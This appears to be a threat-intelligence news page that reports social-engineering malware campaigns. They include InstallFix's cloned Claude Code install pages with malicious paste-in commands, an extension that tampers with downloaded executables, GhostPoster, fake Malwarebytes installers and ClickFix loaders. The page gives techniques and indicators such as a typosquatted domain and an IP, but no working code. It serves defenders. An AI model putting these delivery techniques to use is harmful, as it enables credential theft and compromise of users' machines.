Social-engineering malware delivery via trusted installation and download paths
Security researchers reported two active/feasible malware-delivery patterns that abuse user trust in “normal” software acquisition flows rather than exploiting a specific browser or OS vulnerability. LayerX demonstrated a proof-of-concept Chrome add-on (Totally Innocent Extension) that can silently modify executables as they are downloaded—including from legitimate vendor sites—by appending attacker-controlled code without breaking the original application or requiring additional extension permissions, enabling follow-on outcomes such as persistence, lateral movement, and data theft. The researchers said the technique highlights gaps in browser extension security controls; Google and Mozilla did not acknowledge it as a product issue, with Google indicating social-engineering-driven intrusions fall outside its browser threat model.
Separately, Push Security documented InstallFix, a new variant of the ClickFix social-engineering technique, where attackers clone installation pages for popular CLI tools and replace the install steps with malicious “copy/paste” commands (e.g., curl-to-shell patterns) that fetch payloads from attacker infrastructure. A noted example used a cloned Claude Code (Anthropic) CLI install page that preserved legitimate branding and redirected most links back to the real site, while only the macOS/Windows install instructions delivered malware; the pages were promoted via Google Ads malvertising for searches like “Claude Code install,” increasing the likelihood of developer and non-developer victims executing the malicious commands.
Related Entities
Malware
Sources
Related Stories
Social-Engineering Malware Campaigns Targeting End Users via Browser Stores and Fake Installers
Multiple active **social-engineering-driven malware operations** are targeting end users through trusted distribution channels. One campaign, dubbed **GhostPoster**, distributed **17 malicious browser extensions** across *Chrome, Firefox, and Edge* with **840,000+ installs**, using legitimate-sounding names (e.g., “Google Translate in Right Click,” “Youtube Download,” “Ads Block Ultimate”) and evading store reviews for years. The extensions used **steganography** to hide code in PNGs, then extracted payloads to contact attacker infrastructure, enabling credential/data theft, tracking, affiliate-link hijacking, script injection, and HTTP header manipulation to weaken protections. Separately, threat actors are impersonating **Malwarebytes** via trojanized ZIP “installers” (e.g., `malwarebytes-windows-github-io-X.X.X.zip`) and using **DLL sideloading**—pairing a legitimate EXE with a malicious `CoreMessaging.dll`—to execute **infostealers**; reporting highlighted a campaign fingerprint via **behash** `4acaac53c8340a8c236c91e68244e6cb` and distinctive DLL strings used for infrastructure mapping. A different operation identified by CloudSEK involves **“RedLineCyber”** masquerading as an affiliate of “RedLine Solutions” to build credibility inside private **Discord** communities and deliver a Python-based **clipboard hijacker** (often `Pro.exe` / `peeek.exe`) aimed at **cryptocurrency wallet theft**, relying on long-term grooming of high-value targets rather than broad phishing.
1 months ago
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
3 weeks ago
InstallFix malvertising campaign spreads fake Claude Code installers to deliver Amatera Stealer
Push Security reported a new **ClickFix-style** social-engineering campaign dubbed **InstallFix** that uses **Google-sponsored search ads** to drive developers to near-identical cloned “install” pages for *Anthropic Claude Code* and similar AI coding tools. Victims are prompted to copy/paste terminal commands from the fake pages; executing them installs **Amatera Stealer**, enabling credential theft and potential access to enterprise development environments. Separate reporting highlighted adjacent browser-based tradecraft: a previously legitimate Chrome extension (*QuickLens – Search Screen with Google Lens*) with roughly **7,000 users** was updated to deploy **ClickFix** attacks, strip web security headers, and steal cryptocurrency wallet seed phrases before being removed from the Chrome Web Store. A weekly threat bulletin also noted unrelated incidents (e.g., ransomware and data breaches) and separate AI-themed malicious extensions that harvest LLM chat histories, but those items are not part of the InstallFix/Claude Code malvertising campaign itself.
1 weeks ago